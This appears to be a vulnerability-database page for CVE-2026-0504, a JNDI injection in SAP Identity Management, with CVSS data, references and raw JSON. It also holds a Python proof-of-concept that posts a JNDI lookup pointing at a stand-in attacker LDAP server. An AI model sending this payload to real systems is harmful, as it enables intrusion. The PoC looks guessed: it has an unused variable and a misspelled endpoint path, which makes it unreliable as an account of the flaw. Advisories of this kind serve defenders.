Security Vulnerability Report
CVE-2026-0504 CVSS 3.8 LOW

Published: 2026-01-13 02:15:53
Last Modified: 2026-04-15 00:35:42

Description

Due to insufficient input handling, the SAP Identity Management REST interface allows an authenticated administrator to submit specially crafted malicious REST requests that are processed by JNDI operations without adequate input neutralization. This may lead to limited disclosure or modification of data, resulting in low impact on confidentiality and integrity, with no impact on application availability.

CVSS Details

CVSS Score: 3.8
Severity: LOW
CVSS Vector: CVSS:3.1/AV:N/AC:L/PR:H/UI:N/S:U/C:L/I:L/A:N

Configurations (Affected Products)

No configuration data available.

SAP Identity Management (for the specific affected versions, consult SAP Security Note 3657998)

PoC / Exploit Code

⚠ For Security Research Only
The following code is for security research and authorized testing only.
python
import requests
import json

# CVE-2026-0504 PoC - SAP Identity Management JNDI Injection
# This is a conceptual PoC for educational purposes only

TARGET_URL = "https://vulnerable-server/sap/identiy/rest/api/v1/lookup"
ATTACKER_LDAP = "ldap://attacker-controlled-server:1389/Exploit"

# Authentication headers (requires admin privileges)
headers = {
    "Content-Type": "application/json",
    "Authorization": "Bearer <admin_token>"
}

# Malicious payload with JNDI injection
payload = {
    "lookupName": "${jndi:ldap://attacker-server:1389/Exploit}",
    "searchBase": "ou=users,dc=example,dc=com",
    "searchFilter": "(uid=*)"
}


def exploit_cve_2026_0504():
    """
    Send malicious JNDI injection request to SAP Identity Management REST API
    """
    try:
        response = requests.post(
            TARGET_URL,
            headers=headers,
            json=payload,
            verify=False,
            timeout=10
        )
        print(f"Status Code: {response.status_code}")
        print(f"Response: {response.text}")
        return response
    except requests.exceptions.RequestException as e:
        print(f"Request failed: {e}")
        return None


if __name__ == "__main__":
    print("Testing CVE-2026-0504 JNDI Injection...")
    exploit_cve_2026_0504()

References

https://me.sap.com/notes/3657998
https://url.sap/sapsecuritypatchday

Raw JSON Data

JSON
{"cve": {"id": "CVE-2026-0504", "sourceIdentifier": "[email protected]", "published": "2026-01-13T02:15:53.110", "lastModified": "2026-04-15T00:35:42.020", "vulnStatus": "Deferred", "cveTags": [], "descriptions": [{"lang": "en", "value": "Due to insufficient input handling, the SAP Identity Management REST interface allows an authenticated administrator to submit specially crafted malicious REST requests that are processed by JNDI operations without adequate input neutralization. This may lead to limited disclosure or modification of data, resulting in low impact on confidentiality and integrity, with no impact on application availability."}, {"lang": "es", "value": "Debido a un manejo insuficiente de entrada, la interfaz REST de SAP Identity Management permite a un administrador autenticado enviar solicitudes REST maliciosas especialmente diseñadas que son procesadas por operaciones JNDI sin una neutralización de entrada adecuada. Esto puede llevar a una divulgación limitada o modificación de datos, resultando en un bajo impacto en la confidencialidad y la integridad, sin impacto en la disponibilidad de la aplicación."}], "metrics": {"cvssMetricV31": [{"source": "[email protected]", "type": "Primary", "cvssData": {"version": "3.1", "vectorString": "CVSS:3.1/AV:N/AC:L/PR:H/UI:N/S:U/C:L/I:L/A:N", "baseScore": 3.8, "baseSeverity": "LOW", "attackVector": "NETWORK", "attackComplexity": "LOW", "privilegesRequired": "HIGH", "userInteraction": "NONE", "scope": "UNCHANGED", "confidentialityImpact": "LOW", "integrityImpact": "LOW", "availabilityImpact": "NONE"}, "exploitabilityScore": 1.2, "impactScore": 2.5}]}, "weaknesses": [{"source": "[email protected]", "type": "Primary", "description": [{"lang": "en", "value": "CWE-943"}]}], "references": [{"url": "https://me.sap.com/notes/3657998", "source": "[email protected]"}, {"url": "https://url.sap/sapsecuritypatchday", "source": "[email protected]"}]}}